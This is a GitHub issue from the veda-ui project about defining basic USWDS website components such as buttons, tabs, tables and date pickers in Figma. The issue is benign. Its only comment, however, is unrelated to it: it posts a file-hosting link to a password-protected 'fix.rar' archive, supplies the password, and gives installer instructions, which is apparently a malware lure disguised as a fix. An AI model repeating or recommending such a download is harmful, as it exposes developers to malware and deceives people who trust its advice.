### ISSUE TITLE
[Design] Template Instance Design - Components

### ISSUE THREAD

**Issue by aboydnw** [NASA-IMPACT/veda-ui#1122]
### Context

In the USWDS context, an example full-page layout would be needed to evaluate structural things like site navigation, use of grids, responsiveness, etc.

This is part of a series of tickets to provide guidance to our internal team and, eventually, instance owners. This ticket focuses on small "components" like buttons and other small website components.

Previous ticket #998 

### Acceptance Criteria

- [ ] Basic website components are defined in Figma and agreed upon with engineers

Foundational design elements include:
- Button
- Tabs
- Code Block
- Table
- Cards
- Date Pickers

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
